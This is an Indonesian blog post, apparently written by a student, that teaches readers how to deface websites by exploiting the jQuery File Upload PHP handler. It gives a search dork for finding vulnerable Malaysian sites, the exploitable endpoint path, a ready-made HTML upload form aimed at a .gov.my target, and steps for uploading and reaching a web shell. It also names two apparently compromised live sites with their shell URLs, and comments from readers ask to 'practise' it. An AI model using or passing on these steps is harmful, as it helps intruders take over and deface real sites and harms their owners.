Top Ad Slot (728x90)

Deface dengan Jquery File Upload Full Tutorial 2015

Hai ^_^ ,.
dah lama ya mimin gak update ,yu no lah kan anak SMK gimana tugasnya :v.

dah,langsung aja ke TKP ,

Bahan-Bahan:
1.Default google dork : /assets/global/plugins/jquery-file-upload/ site:my (Kembangin lagi biar joss)
2.Exploit: http://target/assets/global/plugins/jquery-file-upload/server/php/ atau
                 http://target/[Patch]/assets/global/plugins/jquery-file-upload/server/php/ .

3.Script CSRF: Save dengan .html

<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

4. Shell: pakek shell andalan kalian ^_^

Langkah-Langkah:
1.Masukan dork di atas atau dork yang sudah ente kembangin ,pilih target lalu masukan exploitnya,
jika vuln makan ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablabla}]

2.Masukan target anda ke script CSRF tadi .

3.Upload shell anda jika berhasil ada tampilan seperti ini:

4. Akses shell ada di : http://target.gov.my/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php

Noh upload shell mimin berhasil :v

nih barusan mimin dapat 2 yang sukses kena tusbol :v
http://dammam2015.org/x.php
http://www.abaza-auto.net/Index.php

Oke sekian semoga berhasil ^_^


Previous
Next Post »

3 comments

Click here for comments
14 October 2015 at 05:28 ×

wah pingin belajar gan..

Reply
avatar
Unknown
admin
14 October 2015 at 05:59 ×

wah udh lama gak main ginian. jadi pengen nyoba lagi

Reply
avatar
adhie
admin
14 October 2015 at 06:24 ×

nice gan, ijin praktek :)

Reply
avatar

Silahkan berkomentar sesuai tema,gunakan kata-kata yang sopan dalam berkomentar . ConversionConversion EmoticonEmoticon Off Topic